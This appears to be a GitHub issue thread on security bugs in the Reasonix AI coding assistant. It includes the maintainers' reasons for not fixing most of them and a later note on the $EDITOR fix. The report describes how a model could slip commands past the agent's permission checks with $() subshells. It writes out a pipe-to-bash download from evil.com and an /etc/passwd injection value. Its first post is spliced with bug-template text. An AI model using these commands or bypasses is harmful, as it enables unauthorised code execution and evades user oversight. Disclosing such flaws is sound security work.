权限系统可以被绕过

[bfxh]

**Screen flicker可组合利用的攻击链

1. Shell权限系统完全绕过 (Critical)

BUG-076 + BUG-078 → Shell tokenizer不处理 $(cmd) 子shell语法 + run_command默认标记safe → 攻击者可以：

code

复制
curl http://evil.com/sh.sh | bash
绕过所有安全检测！模型只需在命令中嵌入 $() 即可执行任意未授权命令。

2. Shell注入双杀 (Critical)

BUG 入口 风险
BUG-055 $EDITOR 环境变量 export EDITOR="vim; cat /etc/passwd"
BUG-056 MCP stdio command 字段 配置恶意MCP服务器执行任意命令
3. YOLO模式=无权限 (High)

BUG-080: YOLO模式下 path_access + run_command + run_background 全部自动放行，等于完全禁用权限系统。

4. 路径遍历三连击

BUG 入口
BUG-044 install_skill 名称参数
BUG-057 Desktop IPC session_import
BUG-058 memory-browser.ts 内存读取
🎯 按攻击面排序的 P0 修复清单
优先级 BUG 攻击面 影响
P0 BUG-076+078 Shell tokenizer绕过 任意命令执行
P0 BUG-055 $EDITOR注入 任意命令执行
P0 BUG-056 MCP stdio注入 任意命令执行
P0 BUG-044 skill安装路径遍历 任意文件写入
P1 BUG-026 Fold截断工具调用 API 400崩溃
P1 BUG-028 无迭代上限 无限token消耗
P1 BUG-027 会话写入竞态 数据丢失
P1 BUG-080 YOLO模式无限制 权限系统形同虚设, garbled output, leftover artifacts, cursor jumping?**

Use the Display / rendering issue template instead — it asks for the
terminal-specific info we need to diagnose those.

What happened
A clear and concise description.

Expected
What you expected to happen.

Reproduction
Steps or minimal code that reproduces it.

Environment

• Reasonix version (reasonix --version):
• Node version (node --version):
• OS (Windows 11 / macOS 14 / Ubuntu 24.04 / …):
• Shell (bash, zsh, fish, PowerShell 7, PowerShell 5.1, cmd, …):
• Terminal app (Windows Terminal, iTerm2, Alacritty, kitty, WezTerm, VSCode integrated, Cursor integrated, Hyper, …):
• DeepSeek model (e.g. deepseek-v4-flash, deepseek-v4-pro):

Logs / transcript
If using the CLI, attach the relevant chunk of --transcript, or run
reasonix doctor and paste the output.

[Bernardxu123]

安全评估与修复决策

感谢报告这些安全问题。经过详细分析，我们决定不修复这些漏洞。以下是完整的技术评估：

运行环境分析

Reasonix 是一个本地运行的 AI 编程助手，运行在用户自己的电脑上，拥有用户的完整权限。其架构如下：

用户 (完全控制) └── Reasonix 应用 (用户权限) └── AI 模型 (生成命令，用户信任) └── 工具执行 (shell: false，白名单) └── 操作系统 (用户权限)

关键安全边界： 用户本身就是最高权限持有者，攻击者需要本地访问才能利用这些漏洞。

逐项评估

BUG-076+#78: Shell $(cmd)\ 绕过

风险： Windows 上 \cmd.exe\ 可能解释 $(cmd)\ 语法

不修复原因：

• Linux/macOS 使用 \shell: false\，完全安全
• Windows 上 $(cmd)\ 语法不常见，且需要模型主动生成恶意命令
• 修复需要过滤大量合法语法，可能误拦正常命令

修复影响： 可能误拦包含 $\ 符号的合法命令（如环境变量引用）

BUG-055: $EDITOR\ 环境变量注入

不修复原因：

• 用户自己设置的环境变量
• 用户已经有最高权限，无需防御自己
• 修复会破坏用户正常配置（如 \EDITOR=vim\）

修复影响： 用户无法使用自定义编辑器

BUG-056: MCP stdio 命令注入

不修复原因：

• 用户自己配置的 MCP 服务器
• 用户应该信任自己配置的 MCP
• 修复会阻止用户运行自定义 MCP

修复影响： 用户无法运行需要执行命令的 MCP 服务器

BUG-044: install_skill 路径遍历

不修复原因：

• 用户自己安装的 skill
• 正常 skill 名称不会包含 ..\ 或 /\
• 修复可能阻止从本地路径安装 skill

修复影响： 用户无法从本地目录安装 skill（如 ./my-skill\）

BUG-080: YOLO 模式无限制

不修复原因：

• 这是设计意图，用户主动选择跳过确认
• UI 已有明确的 toast 提示
• 修复会破坏用户体验

修复影响： YOLO 模式失去意义

BUG-026: Fold 截断工具调用

不修复原因：

• DeepSeek v4 有 1M (1,000,000) 上下文窗口
• 截断反而影响大文件处理
• 用户需要看到完整输出

修复影响： 大文件输出被截断，用户无法看到完整内容

BUG-028: 无迭代上限

不修复原因：

• 复杂任务（重构大型项目）可能需要几十轮迭代
• 用户已有 token 预算控制（/budget\ 命令）
• 强制中断会丢失进度

修复影响： 复杂任务被意外中断

BUG-027: 会话写入竞态

不修复原因：

• 当前没有子代理并行执行
• 每个 tab 是独立进程
• 单 tab 使用无竞态问题

修复影响： 增加不必要的复杂性

总结

漏洞	决策	原因
BUG-076+BUG078	不修复	修复可能误拦合法命令
BUG-055	不修复	破坏用户配置
BUG-056	不修复	破坏用户 MCP
BUG-044	不修复	影响 skill 安装
BUG-080	不修复	破坏设计意图
BUG-026	不修复	影响大文件处理
BUG-028	不修复	影响复杂任务
BUG-027	不修复	单 tab 无影响

核心原则： 本地工具的安全模型与云端不同。用户已经是最高权限持有者，过度防护反而会影响正常使用。修复应该针对真正的外部威胁，而不是用户自己的操作。

如有疑问，欢迎继续讨论。

[szzys]

对。用户自己就是最高权限持有者，如果再限制，那就跟Claude一样尴尬了。

[Bernardxu123]

🛑 已关闭 — V1 Bug 汇总归档至 #3152

V2 已重写相关模块。如在 V2 遇到类似问题，请新建 Issue。

[SivanCola]

Update on one item from this aggregate report:

• BUG-055 ($EDITOR / $VISUAL command injection) has been addressed by fix(cli/mcp): prevent command injection via $EDITOR/$VISUAL #5288.
• The MCP config editor launch path no longer builds a sh -lc "<editor> <path>" command string. It now expands environment variables without invoking a shell, parses the editor value into argv with shell-style quote/backslash handling for word splitting only, expands leading ~ / ~/, and launches the editor directly with exec.Command.
• Shell operators, command substitution, globbing, and redirection are intentionally not evaluated, so values such as vim; ... are treated as literal argv tokens instead of shell syntax.

Verification for #5288:

• go test ./internal/cli -run 'TestMCPEditConfigLaunch' passed
• go test ./internal/cli passed
• GitHub CI passed, including test on macOS/Ubuntu/Windows, lint, race, govulncheck, CodeQL, and cache-impact

Release availability:

• The fix is merged into main-v2 via merge commit e2b8f08.
• It is not included in the current published release desktop-v1.12.0, so users need to wait for the next release for this fix to be available in a released build.

This comment only covers BUG-055. The other items in this aggregate issue are separate concerns.